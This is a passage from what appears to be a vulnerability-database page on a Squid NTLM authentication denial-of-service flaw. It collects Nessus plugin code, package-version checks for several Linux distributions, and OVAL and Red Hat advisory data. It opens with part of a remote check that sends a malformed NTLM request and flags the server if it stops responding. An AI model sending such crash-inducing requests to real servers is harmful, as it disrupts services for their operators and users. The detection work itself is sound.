    if (!soc) exit (0);
    
    # We retry with a malicious request
    
    # First we send type1 req
    send(socket:soc, data:type1req);
    r = http_recv(socket:soc);
    
    if (!r) exit(0);
    
    # Now type3req
    send(socket:soc, data:type3req_attack);
    r = http_recv(socket:soc);
    
    if (!r)
      security_warning( port:port );
    
    
    close (soc);
    
  • NASL familyUbuntu Local Security Checks
    NASL idUBUNTU_USN-192-1.NASL
    descriptionMike Diggins discovered a remote Denial of Service vulnerability in Squid. Sending specially crafted NTML authentication requests to Squid caused the server to crash. Note that Tenable Network Security has extracted the preceding description block directly from the Ubuntu security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.
    last seen2020-06-01
    modified2020-06-02
    plugin id20606
    published2006-01-15
    reporterUbuntu Security Notice (C) 2005-2019 Canonical, Inc. / NASL script (C) 2006-2016 Tenable Network Security, Inc.
    sourcehttps://www.tenable.com/plugins/nessus/20606
    titleUbuntu 4.10 / 5.04 : squid vulnerability (USN-192-1)
    code
    #%NASL_MIN_LEVEL 80502
    
    #
    # (C) Tenable Network Security, Inc.
    #
    # The descriptive text and package checks in this plugin were
    # extracted from Ubuntu Security Notice USN-192-1. The text 
    # itself is copyright (C) Canonical, Inc. See 
    # <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered 
    # trademark of Canonical, Inc.
    #
    
    include("compat.inc");
    
    if (description)
    {
      script_id(20606);
      script_version("1.15");
      script_cvs_date("Date: 2019/08/02 13:33:00");
    
      script_cve_id("CVE-2005-2917");
      script_xref(name:"USN", value:"192-1");
    
      script_name(english:"Ubuntu 4.10 / 5.04 : squid vulnerability (USN-192-1)");
      script_summary(english:"Checks dpkg output for updated packages.");
    
      script_set_attribute(
        attribute:"synopsis", 
        value:
    "The remote Ubuntu host is missing one or more security-related
    patches."
      );
      script_set_attribute(
        attribute:"description", 
        value:
    "Mike Diggins discovered a remote Denial of Service vulnerability in
    Squid. Sending specially crafted NTML authentication requests to Squid
    caused the server to crash.
    
    Note that Tenable Network Security has extracted the preceding
    description block directly from the Ubuntu security advisory. Tenable
    has attempted to automatically clean and format it as much as possible
    without introducing additional issues."
      );
      script_set_attribute(attribute:"solution", value:"Update the affected packages.");
      script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P");
    
      script_set_attribute(attribute:"plugin_type", value:"local");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:canonical:ubuntu_linux:squid");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:canonical:ubuntu_linux:squid-cgi");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:canonical:ubuntu_linux:squid-common");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:canonical:ubuntu_linux:squidclient");
      script_set_attribute(attribute:"cpe", value:"cpe:/o:canonical:ubuntu_linux:4.10");
      script_set_attribute(attribute:"cpe", value:"cpe:/o:canonical:ubuntu_linux:5.04");
    
      script_set_attribute(attribute:"patch_publication_date", value:"2005/09/30");
      script_set_attribute(attribute:"plugin_publication_date", value:"2006/01/15");
      script_set_attribute(attribute:"vuln_publication_date", value:"2005/09/12");
      script_end_attributes();
    
      script_category(ACT_GATHER_INFO);
      script_copyright(english:"Ubuntu Security Notice (C) 2005-2019 Canonical, Inc. / NASL script (C) 2006-2016 Tenable Network Security, Inc.");
      script_family(english:"Ubuntu Local Security Checks");
    
      script_dependencies("ssh_get_info.nasl");
      script_require_keys("Host/cpu", "Host/Ubuntu", "Host/Ubuntu/release", "Host/Debian/dpkg-l");
    
      exit(0);
    }
    
    
    include("audit.inc");
    include("ubuntu.inc");
    include("misc_func.inc");
    
    if ( ! get_kb_item("Host/local_checks_enabled") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);
    release = get_kb_item("Host/Ubuntu/release");
    if ( isnull(release) ) audit(AUDIT_OS_NOT, "Ubuntu");
    release = chomp(release);
    if (! ereg(pattern:"^(4\.10|5\.04)$", string:release)) audit(AUDIT_OS_NOT, "Ubuntu 4.10 / 5.04", "Ubuntu " + release);
    if ( ! get_kb_item("Host/Debian/dpkg-l") ) audit(AUDIT_PACKAGE_LIST_MISSING);
    
    cpu = get_kb_item("Host/cpu");
    if (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);
    if ("x86_64" >!< cpu && cpu !~ "^i[3-6]86$") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, "Ubuntu", cpu);
    
    flag = 0;
    
    if (ubuntu_check(osver:"4.10", pkgname:"squid", pkgver:"2.5.5-6ubuntu0.11")) flag++;
    if (ubuntu_check(osver:"4.10", pkgname:"squid-cgi", pkgver:"2.5.5-6ubuntu0.11")) flag++;
    if (ubuntu_check(osver:"4.10", pkgname:"squid-common", pkgver:"2.5.5-6ubuntu0.11")) flag++;
    if (ubuntu_check(osver:"4.10", pkgname:"squidclient", pkgver:"2.5.5-6ubuntu0.11")) flag++;
    if (ubuntu_check(osver:"5.04", pkgname:"squid", pkgver:"2.5.8-3ubuntu1.4")) flag++;
    if (ubuntu_check(osver:"5.04", pkgname:"squid-cgi", pkgver:"2.5.8-3ubuntu1.4")) flag++;
    if (ubuntu_check(osver:"5.04", pkgname:"squid-common", pkgver:"2.5.8-3ubuntu1.4")) flag++;
    if (ubuntu_check(osver:"5.04", pkgname:"squidclient", pkgver:"2.5.8-3ubuntu1.4")) flag++;
    
    if (flag)
    {
      security_report_v4(
        port       : 0,
        severity   : SECURITY_WARNING,
        extra      : ubuntu_report_get()
      );
      exit(0);
    }
    else
    {
      tested = ubuntu_pkg_tests_get();
      if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);
      else audit(AUDIT_PACKAGE_NOT_INSTALLED, "squid / squid-cgi / squid-common / squidclient");
    }
    
  • NASL familyRed Hat Local Security Checks
    NASL idREDHAT-RHSA-2006-0045.NASL
    descriptionUpdated squid packages that fix a security vulnerability as well as several bugs are now available. This update has been rated as having moderate security impact by the Red Hat Security Response Team. Squid is a high-performance proxy caching server for Web clients, supporting FTP, gopher, and HTTP data objects. A denial of service flaw was found in the way squid processes certain NTLM authentication requests. A remote attacker could send a specially crafted NTLM authentication request which would cause the Squid server to crash. The Common Vulnerabilities and Exposures project assigned the name CVE-2005-2917 to this issue. Several bugs have also been addressed in this update : * An error introduced in 2.5.STABLE3-6.3E.14 where Squid can crash if a user visits a site which has a long DNS record. * Some authentication helpers were missing needed setuid rights. * Squid couldn
    last seen2020-06-01
    modified2020-06-02
    plugin id21087
    published2006-03-16
    reporterThis script is Copyright (C) 2006-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/21087
    titleRHEL 3 : squid (RHSA-2006:0045)
    code
    #%NASL_MIN_LEVEL 80502
    #
    # (C) Tenable Network Security, Inc.
    #
    # The descriptive text and package checks in this plugin were  
    # extracted from Red Hat Security Advisory RHSA-2006:0045. The text 
    # itself is copyright (C) Red Hat, Inc.
    #
    
    include("compat.inc");
    
    if (description)
    {
      script_id(21087);
      script_version ("1.21");
      script_cvs_date("Date: 2019/10/25 13:36:11");
    
      script_cve_id("CVE-2005-2917");
      script_xref(name:"RHSA", value:"2006:0045");
    
      script_name(english:"RHEL 3 : squid (RHSA-2006:0045)");
      script_summary(english:"Checks the rpm output for the updated package");
    
      script_set_attribute(
        attribute:"synopsis", 
        value:"The remote Red Hat host is missing a security update."
      );
      script_set_attribute(
        attribute:"description", 
        value:
    "Updated squid packages that fix a security vulnerability as well as
    several bugs are now available.
    
    This update has been rated as having moderate security impact by the
    Red Hat Security Response Team.
    
    Squid is a high-performance proxy caching server for Web clients,
    supporting FTP, gopher, and HTTP data objects.
    
    A denial of service flaw was found in the way squid processes certain
    NTLM authentication requests. A remote attacker could send a specially
    crafted NTLM authentication request which would cause the Squid server
    to crash. The Common Vulnerabilities and Exposures project assigned
    the name CVE-2005-2917 to this issue.
    
    Several bugs have also been addressed in this update :
    
    * An error introduced in 2.5.STABLE3-6.3E.14 where Squid can crash if
    a user visits a site which has a long DNS record.
    
    * Some authentication helpers were missing needed setuid rights.
    
    * Squid couldn't handle a reply from a HTTP server when the reply
    began with the new-line character or wasn't HTTP/1.0 or HTTP/1.1
    compliant.
    
    * User-defined error pages were not kept when the squid package was
    upgraded.
    
    All users of squid should upgrade to these updated packages, which
    contain backported patches to resolve these issues."
      );
      script_set_attribute(
        attribute:"see_also",
        value:"https://access.redhat.com/security/cve/cve-2005-2917"
      );
      script_set_attribute(
        attribute:"see_also",
        value:"https://access.redhat.com/errata/RHSA-2006:0045"
      );
      script_set_attribute(attribute:"solution", value:"Update the affected squid package.");
      script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P");
    
      script_set_attribute(attribute:"plugin_type", value:"local");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:squid");
      script_set_attribute(attribute:"cpe", value:"cpe:/o:redhat:enterprise_linux:3");
    
      script_set_attribute(attribute:"vuln_publication_date", value:"2005/09/30");
      script_set_attribute(attribute:"patch_publication_date", value:"2006/03/15");
      script_set_attribute(attribute:"plugin_publication_date", value:"2006/03/16");
      script_set_attribute(attribute:"generated_plugin", value:"current");
      script_end_attributes();
    
      script_category(ACT_GATHER_INFO);
      script_copyright(english:"This script is Copyright (C) 2006-2019 and is owned by Tenable, Inc. or an Affiliate thereof.");
      script_family(english:"Red Hat Local Security Checks");
    
      script_dependencies("ssh_get_info.nasl");
      script_require_keys("Host/local_checks_enabled", "Host/RedHat/release", "Host/RedHat/rpm-list", "Host/cpu");
    
      exit(0);
    }
    
    
    include("audit.inc");
    include("global_settings.inc");
    include("misc_func.inc");
    include("rpm.inc");
    
    if (!get_kb_item("Host/local_checks_enabled")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);
    release = get_kb_item("Host/RedHat/release");
    if (isnull(release) || "Red Hat" >!< release) audit(AUDIT_OS_NOT, "Red Hat");
    os_ver = pregmatch(pattern: "Red Hat Enterprise Linux.*release ([0-9]+(\.[0-9]+)?)", string:release);
    if (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, "Red Hat");
    os_ver = os_ver[1];
    if (! preg(pattern:"^3([^0-9]|$)", string:os_ver)) audit(AUDIT_OS_NOT, "Red Hat 3.x", "Red Hat " + os_ver);
    
    if (!get_kb_item("Host/RedHat/rpm-list")) audit(AUDIT_PACKAGE_LIST_MISSING);
    
    cpu = get_kb_item("Host/cpu");
    if (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);
    if ("x86_64" >!< cpu && cpu !~ "^i[3-6]86$" && "s390" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, "Red Hat", cpu);
    
    yum_updateinfo = get_kb_item("Host/RedHat/yum-updateinfo");
    if (!empty_or_null(yum_updateinfo)) 
    {
      rhsa = "RHSA-2006:0045";
      yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);
      if (!empty_or_null(yum_report))
      {
        security_report_v4(
          port       : 0,
          severity   : SECURITY_WARNING,
          extra      : yum_report 
        );
        exit(0);
      }
      else
      {
        audit_message = "affected by Red Hat security advisory " + rhsa;
        audit(AUDIT_OS_NOT, audit_message);
      }
    }
    else
    {
      flag = 0;
      if (rpm_check(release:"RHEL3", reference:"squid-2.5.STABLE3-6.3E.16")) flag++;
    
      if (flag)
      {
        security_report_v4(
          port       : 0,
          severity   : SECURITY_WARNING,
          extra      : rpm_report_get() + redhat_report_package_caveat()
        );
        exit(0);
      }
      else
      {
        tested = pkg_tests_get();
        if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);
        else audit(AUDIT_PACKAGE_NOT_INSTALLED, "squid");
      }
    }
    
  • NASL familyDebian Local Security Checks
    NASL idDEBIAN_DSA-828.NASL
    descriptionUpstream developers of squid, the popular WWW proxy cache, have discovered that changes in the authentication scheme are not handled properly when given certain request sequences while NTLM authentication is in place, which may cause the daemon to restart.
    last seen2020-06-01
    modified2020-06-02
    plugin id19797
    published2005-10-05
    reporterThis script is Copyright (C) 2005-2019 Tenable Network Security, Inc.
    sourcehttps://www.tenable.com/plugins/nessus/19797
    titleDebian DSA-828-1 : squid - authentication handling
    code
    #%NASL_MIN_LEVEL 80502
    
    #
    # (C) Tenable Network Security, Inc.
    #
    # The descriptive text and package checks in this plugin were  
    # extracted from Debian Security Advisory DSA-828. The text 
    # itself is copyright (C) Software in the Public Interest, Inc.
    #
    
    include("compat.inc");
    
    if (description)
    {
      script_id(19797);
      script_version("1.17");
      script_cvs_date("Date: 2019/08/02 13:32:19");
    
      script_cve_id("CVE-2005-2917");
      script_xref(name:"DSA", value:"828");
    
      script_name(english:"Debian DSA-828-1 : squid - authentication handling");
      script_summary(english:"Checks dpkg output for the updated package");
    
      script_set_attribute(
        attribute:"synopsis", 
        value:"The remote Debian host is missing a security-related update."
      );
      script_set_attribute(
        attribute:"description", 
        value:
    "Upstream developers of squid, the popular WWW proxy cache, have
    discovered that changes in the authentication scheme are not handled
    properly when given certain request sequences while NTLM
    authentication is in place, which may cause the daemon to restart."
      );
      script_set_attribute(
        attribute:"see_also",
        value:"http://www.debian.org/security/2005/dsa-828"
      );
      script_set_attribute(
        attribute:"solution", 
        value:
    "Upgrade the squid packages.
    
    The old stable distribution (woody) is not affected by this problem.
    
    For the stable distribution (sarge) this problem has been fixed in
    version 2.5.9-10sarge2."
      );
      script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P");
    
      script_set_attribute(attribute:"plugin_type", value:"local");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:debian:debian_linux:squid");
      script_set_attribute(attribute:"cpe", value:"cpe:/o:debian:debian_linux:3.1");
    
      script_set_attribute(attribute:"patch_publication_date", value:"2005/09/30");
      script_set_attribute(attribute:"plugin_publication_date", value:"2005/10/05");
      script_set_attribute(attribute:"vuln_publication_date", value:"2005/09/12");
      script_end_attributes();
    
      script_category(ACT_GATHER_INFO);
      script_copyright(english:"This script is Copyright (C) 2005-2019 Tenable Network Security, Inc.");
      script_family(english:"Debian Local Security Checks");
    
      script_dependencies("ssh_get_info.nasl");
      script_require_keys("Host/local_checks_enabled", "Host/Debian/release", "Host/Debian/dpkg-l");
    
      exit(0);
    }
    
    
    include("audit.inc");
    include("debian_package.inc");
    
    
    if (!get_kb_item("Host/local_checks_enabled")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);
    if (!get_kb_item("Host/Debian/release")) audit(AUDIT_OS_NOT, "Debian");
    if (!get_kb_item("Host/Debian/dpkg-l")) audit(AUDIT_PACKAGE_LIST_MISSING);
    
    
    flag = 0;
    if (deb_check(release:"3.1", prefix:"squid", reference:"2.5.9-10sarge2")) flag++;
    if (deb_check(release:"3.1", prefix:"squid-cgi", reference:"2.5.9-10sarge2")) flag++;
    if (deb_check(release:"3.1", prefix:"squid-common", reference:"2.5.9-10sarge2")) flag++;
    if (deb_check(release:"3.1", prefix:"squidclient", reference:"2.5.9-10sarge2")) flag++;
    
    if (flag)
    {
      if (report_verbosity > 0) security_warning(port:0, extra:deb_report_get());
      else security_warning(0);
      exit(0);
    }
    else audit(AUDIT_HOST_NOT, "affected");
    
  • NASL familyMandriva Local Security Checks
    NASL idMANDRAKE_MDKSA-2005-181.NASL
    descriptionSquid 2.5.9, while performing NTLM authentication, does not properly handle certain request sequences, which allows attackers to cause a denial of service (daemon restart). The updated packages have been patched to address these issues.
    last seen2020-06-01
    modified2020-06-02
    plugin id20041
    published2005-10-19
    reporterThis script is Copyright (C) 2005-2019 Tenable Network Security, Inc.
    sourcehttps://www.tenable.com/plugins/nessus/20041
    titleMandrake Linux Security Advisory : squid (MDKSA-2005:181)
    code
    #%NASL_MIN_LEVEL 80502
    
    #
    # (C) Tenable Network Security, Inc.
    #
    # The descriptive text and package checks in this plugin were  
    # extracted from Mandrake Linux Security Advisory MDKSA-2005:181. 
    # The text itself is copyright (C) Mandriva S.A.
    #
    
    include("compat.inc");
    
    if (description)
    {
      script_id(20041);
      script_version ("1.17");
      script_cvs_date("Date: 2019/08/02 13:32:48");
    
      script_cve_id("CVE-2005-2917");
      script_xref(name:"MDKSA", value:"2005:181");
    
      script_name(english:"Mandrake Linux Security Advisory : squid (MDKSA-2005:181)");
      script_summary(english:"Checks rpm output for the updated packages");
    
      script_set_attribute(
        attribute:"synopsis", 
        value:
    "The remote Mandrake Linux host is missing one or more security
    updates."
      );
      script_set_attribute(
        attribute:"description", 
        value:
    "Squid 2.5.9, while performing NTLM authentication, does not properly
    handle certain request sequences, which allows attackers to cause a
    denial of service (daemon restart).
    
    The updated packages have been patched to address these issues."
      );
      script_set_attribute(
        attribute:"solution", 
        value:"Update the affected squid and / or squid-cachemgr packages."
      );
      script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P");
    
      script_set_attribute(attribute:"plugin_type", value:"local");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:mandriva:linux:squid");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:mandriva:linux:squid-cachemgr");
      script_set_attribute(attribute:"cpe", value:"cpe:/o:mandrakesoft:mandrake_linux:10.1");
      script_set_attribute(attribute:"cpe", value:"cpe:/o:mandriva:linux:2006");
      script_set_attribute(attribute:"cpe", value:"x-cpe:/o:mandrakesoft:mandrake_linux:le2005");
    
      script_set_attribute(attribute:"patch_publication_date", value:"2005/10/11");
      script_set_attribute(attribute:"plugin_publication_date", value:"2005/10/19");
      script_end_attributes();
    
      script_category(ACT_GATHER_INFO);
      script_copyright(english:"This script is Copyright (C) 2005-2019 Tenable Network Security, Inc.");
      script_family(english:"Mandriva Local Security Checks");
    
      script_dependencies("ssh_get_info.nasl");
      script_require_keys("Host/local_checks_enabled", "Host/cpu", "Host/Mandrake/release", "Host/Mandrake/rpm-list");
    
      exit(0);
    }
    
    
    include("audit.inc");
    include("global_settings.inc");
    include("rpm.inc");
    
    
    if (!get_kb_item("Host/local_checks_enabled")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);
    if (!get_kb_item("Host/Mandrake/release")) audit(AUDIT_OS_NOT, "Mandriva / Mandake Linux");
    if (!get_kb_item("Host/Mandrake/rpm-list")) audit(AUDIT_PACKAGE_LIST_MISSING);
    
    cpu = get_kb_item("Host/cpu");
    if (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);
    if (cpu !~ "^(amd64|i[3-6]86|x86_64)$") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, "Mandriva / Mandrake Linux", cpu);
    
    
    flag = 0;
    if (rpm_check(release:"MDK10.1", reference:"squid-2.5.STABLE9-1.4.101mdk", yank:"mdk")) flag++;
    
    if (rpm_check(release:"MDK10.2", reference:"squid-2.5.STABLE9-1.4.102mdk", yank:"mdk")) flag++;
    
    if (rpm_check(release:"MDK2006.0", reference:"squid-2.5.STABLE10-10.1.20060mdk", yank:"mdk")) flag++;
    if (rpm_check(release:"MDK2006.0", reference:"squid-cachemgr-2.5.STABLE10-10.1.20060mdk", yank:"mdk")) flag++;
    
    
    if (flag)
    {
      if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());
      else security_warning(0);
      exit(0);
    }
    else audit(AUDIT_HOST_NOT, "affected");
    
  • NASL familyCentOS Local Security Checks
    NASL idCENTOS_RHSA-2006-0045.NASL
    descriptionUpdated squid packages that fix a security vulnerability as well as several bugs are now available. This update has been rated as having moderate security impact by the Red Hat Security Response Team. Squid is a high-performance proxy caching server for Web clients, supporting FTP, gopher, and HTTP data objects. A denial of service flaw was found in the way squid processes certain NTLM authentication requests. A remote attacker could send a specially crafted NTLM authentication request which would cause the Squid server to crash. The Common Vulnerabilities and Exposures project assigned the name CVE-2005-2917 to this issue. Several bugs have also been addressed in this update : * An error introduced in 2.5.STABLE3-6.3E.14 where Squid can crash if a user visits a site which has a long DNS record. * Some authentication helpers were missing needed setuid rights. * Squid couldn
    last seen2020-06-01
    modified2020-06-02
    plugin id21879
    published2006-07-03
    reporterThis script is Copyright (C) 2006-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/21879
    titleCentOS 3 : squid (CESA-2006:0045)
    code
    #%NASL_MIN_LEVEL 80502
    #
    # (C) Tenable Network Security, Inc.
    #
    # The descriptive text and package checks in this plugin were  
    # extracted from Red Hat Security Advisory RHSA-2006:0045 and 
    # CentOS Errata and Security Advisory 2006:0045 respectively.
    #
    
    include("compat.inc");
    
    if (description)
    {
      script_id(21879);
      script_version("1.15");
      script_cvs_date("Date: 2019/10/25 13:36:03");
    
      script_cve_id("CVE-2005-2917");
      script_xref(name:"RHSA", value:"2006:0045");
    
      script_name(english:"CentOS 3 : squid (CESA-2006:0045)");
      script_summary(english:"Checks rpm output for the updated package");
    
      script_set_attribute(
        attribute:"synopsis", 
        value:"The remote CentOS host is missing a security update."
      );
      script_set_attribute(
        attribute:"description", 
        value:
    "Updated squid packages that fix a security vulnerability as well as
    several bugs are now available.
    
    This update has been rated as having moderate security impact by the
    Red Hat Security Response Team.
    
    Squid is a high-performance proxy caching server for Web clients,
    supporting FTP, gopher, and HTTP data objects.
    
    A denial of service flaw was found in the way squid processes certain
    NTLM authentication requests. A remote attacker could send a specially
    crafted NTLM authentication request which would cause the Squid server
    to crash. The Common Vulnerabilities and Exposures project assigned
    the name CVE-2005-2917 to this issue.
    
    Several bugs have also been addressed in this update :
    
    * An error introduced in 2.5.STABLE3-6.3E.14 where Squid can crash if
    a user visits a site which has a long DNS record.
    
    * Some authentication helpers were missing needed setuid rights.
    
    * Squid couldn't handle a reply from a HTTP server when the reply
    began with the new-line character or wasn't HTTP/1.0 or HTTP/1.1
    compliant.
    
    * User-defined error pages were not kept when the squid package was
    upgraded.
    
    All users of squid should upgrade to these updated packages, which
    contain backported patches to resolve these issues."
      );
      # https://lists.centos.org/pipermail/centos-announce/2006-March/012742.html
      script_set_attribute(
        attribute:"see_also",
        value:"http://www.nessus.org/u?b34aaf15"
      );
      # https://lists.centos.org/pipermail/centos-announce/2006-March/012743.html
      script_set_attribute(
        attribute:"see_also",
        value:"http://www.nessus.org/u?cf20e8ad"
      );
      # https://lists.centos.org/pipermail/centos-announce/2006-March/012759.html
      script_set_attribute(
        attribute:"see_also",
        value:"http://www.nessus.org/u?a60dc0b5"
      );
      script_set_attribute(attribute:"solution", value:"Update the affected squid package.");
      script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P");
    
      script_set_attribute(attribute:"plugin_type", value:"local");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:centos:centos:squid");
      script_set_attribute(attribute:"cpe", value:"cpe:/o:centos:centos:3");
    
      script_set_attribute(attribute:"vuln_publication_date", value:"2005/09/30");
      script_set_attribute(attribute:"patch_publication_date", value:"2006/03/15");
      script_set_attribute(attribute:"plugin_publication_date", value:"2006/07/03");
      script_set_attribute(attribute:"generated_plugin", value:"current");
      script_end_attributes();
    
      script_category(ACT_GATHER_INFO);
      script_copyright(english:"This script is Copyright (C) 2006-2019 and is owned by Tenable, Inc. or an Affiliate thereof.");
      script_family(english:"CentOS Local Security Checks");
    
      script_dependencies("ssh_get_info.nasl");
      script_require_keys("Host/local_checks_enabled", "Host/CentOS/release", "Host/CentOS/rpm-list");
    
      exit(0);
    }
    
    
    include("audit.inc");
    include("global_settings.inc");
    include("rpm.inc");
    
    
    if (!get_kb_item("Host/local_checks_enabled")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);
    release = get_kb_item("Host/CentOS/release");
    if (isnull(release) || "CentOS" >!< release) audit(AUDIT_OS_NOT, "CentOS");
    os_ver = pregmatch(pattern: "CentOS(?: Linux)? release ([0-9]+)", string:release);
    if (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, "CentOS");
    os_ver = os_ver[1];
    if (! preg(pattern:"^3([^0-9]|$)", string:os_ver)) audit(AUDIT_OS_NOT, "CentOS 3.x", "CentOS " + os_ver);
    
    if (!get_kb_item("Host/CentOS/rpm-list")) audit(AUDIT_PACKAGE_LIST_MISSING);
    
    
    cpu = get_kb_item("Host/cpu");
    if (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);
    if ("x86_64" >!< cpu && "ia64" >!< cpu && cpu !~ "^i[3-6]86$") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, "CentOS", cpu);
    
    
    flag = 0;
    if (rpm_check(release:"CentOS-3", reference:"squid-2.5.STABLE3-6.3E.16")) flag++;
    
    
    if (flag)
    {
      security_report_v4(
        port       : 0,
        severity   : SECURITY_WARNING,
        extra      : rpm_report_get()
      );
      exit(0);
    }
    else
    {
      tested = pkg_tests_get();
      if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);
      else audit(AUDIT_PACKAGE_NOT_INSTALLED, "squid");
    }
    

Oval

accepted2013-04-29T04:14:48.859-04:00
classvulnerability
contributors
  • nameAharon Chernin
    organizationSCAP.com, LLC
  • nameDragos Prisaca
    organizationG2, Inc.
definition_extensions
  • commentThe operating system installed on the system is Red Hat Enterprise Linux 3
    ovaloval:org.mitre.oval:def:11782
  • commentCentOS Linux 3.x
    ovaloval:org.mitre.oval:def:16651
  • commentThe operating system installed on the system is Red Hat Enterprise Linux 4
    ovaloval:org.mitre.oval:def:11831
  • commentCentOS Linux 4.x
    ovaloval:org.mitre.oval:def:16636
  • commentOracle Linux 4.x
    ovaloval:org.mitre.oval:def:15990
descriptionSquid 2.5.STABLE10 and earlier, while performing NTLM authentication, does not properly handle certain request sequences, which allows attackers to cause a denial of service (daemon restart).
familyunix
idoval:org.mitre.oval:def:11580
statusaccepted
submitted2010-07-09T03:56:16-04:00
titleSquid 2.5.STABLE10 and earlier, while performing NTLM authentication, does not properly handle certain request sequences, which allows attackers to cause a denial of service (daemon restart).
version26

Redhat

advisories
  • bugzilla
    id172697
    titleSquid doesn't handle headers split across packets
    oval
    OR
    • commentRed Hat Enterprise Linux must be installed
      ovaloval:com.redhat.rhba:tst:20070304026
    • AND
      • commentRed Hat Enterprise Linux 4 is installed
        ovaloval:com.redhat.rhba:tst:20070304025
      • commentsquid is earlier than 7:2.5.STABLE6-3.4E.12
        ovaloval:com.redhat.rhsa:tst:20060052001
      • commentsquid is signed with Red Hat master key
        ovaloval:com.redhat.rhsa:tst:20060052002
    rhsa
    idRHSA-2006:0052
    released2006-03-07
    severityModerate
    titleRHSA-2006:0052: squid security update (Moderate)
  • rhsa
    idRHSA-2006:0045
rpms
  • squid-7:2.5.STABLE3-6.3E.16
  • squid-debuginfo-7:2.5.STABLE3-6.3E.16
  • squid-7:2.5.STABLE6-3.4E.12
  • squid-debuginfo-7:2.5.STABLE6-3.4E.12